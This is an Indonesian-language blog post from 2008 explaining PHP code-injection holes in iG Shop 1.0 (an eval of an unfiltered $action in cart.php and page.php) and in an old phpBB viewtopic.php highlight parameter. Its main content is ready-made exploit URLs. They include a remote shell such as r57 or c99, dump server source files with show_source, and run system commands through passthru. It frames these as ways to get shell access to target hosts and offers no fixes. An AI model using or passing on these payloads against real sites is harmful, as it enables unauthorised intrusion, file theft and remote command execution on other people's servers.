20 May 2008

PHP injection phpbb dan ig shop

IG shop dan phpbb bukanlah satu vendor yang sama.
IG shop : http://www.igeneric.co.uk/ig-shopping-cart.html
phpbb : http://www.phpbb.com
Namun kesamaan dari 2 php scripts ini adalah opensource.
Kesamaan lainya adalah terdapat 2 celah php injection yang pernah terjadi di versi versi sebelumnya.

Php injection disini bukanlah yang di kenal dengan RFI LFI atau SQL INJECTION.
php injection disini adalah dimana kita dapat menyisipkan perintah perintah php pada url target.


---------------
| iG Shop 1.0 |
---------------


vuln php injection di IG shop terjadi pada page.php dan cart.php dimana perintah eval memangil variabel
yang tak terfilter dengan baik ( http://milw0rm.com/exploits/3083 ).

cart.php pada line 692
eval ("cart_$action();");

page.php pada line 336
eval ("page_$action();");

variabel $action pada ke 2 file tersebut tidak terfilter dengan baik, sehingga memungkinkan kita untuk memangil
variabel tersebut dan menyisipkanya pada url.

Dengan menyisipkan injection ini kita bisa mendapatkan access shell dengan mengunakan r57 atau c99
page.php?action=exit.include($_GET[cok]);exit&cok=[shell]
cart.php?action=exit.include($_GET[cok]);exit&cok=[shell]

Dengan menyisipkan php injection ini kita bisa melihat isi file file penting yang terdapat dalam host
page.php?action=exit.show_source($_GET[cok]);exit&cok=page.php
cart.php?action=exit.show_source($_GET[cok]);exit&cok=page.php

Dengan menyisipkan php injection berikut ini kita bisa menginjeckan perintah shell pada url
page.php?action=exit.passthru($_GET[cok]);exit&cok=uname -a
cart.php?action=exit.passthru($_GET[cok]);exit&cok=id

Kita juga dapat mencoba dengan berbagai macam perintah php seperti fopen readfile dll.


-----------------------------------------
| copyright : (C) 2001 The phpBB Group |
-----------------------------------------

Vuln phpbb terjadi pada file viewtopic.php dimana perintah urlencode memangil variabel highlight yang tak terfilter dengan baik.

explode(' ', trim(htmlspecialchars(urldecode($HTTP_GET_VARS['highlight']))));
$highlight = urlencode($HTTP_GET_VARS['highlight']);

Dengan munganakan single quote (') yang di convert dalam hex dan character titik (.) kita bisa menyisipkan php injection ke dalam url.

viewtopic.php?p=15&highlight=%2527.show_source($_GET[file]),exit.%2527&file=viewtopic.php
viewtopic.php?p=15&highlight=%2527.include($_GET[file]),exit.%2527&file=[shell]

di 7:33 AM

Share |

Label:

0 komentar:

Post a Comment

Subscribe to: Post Comments (Atom)
powered by irvian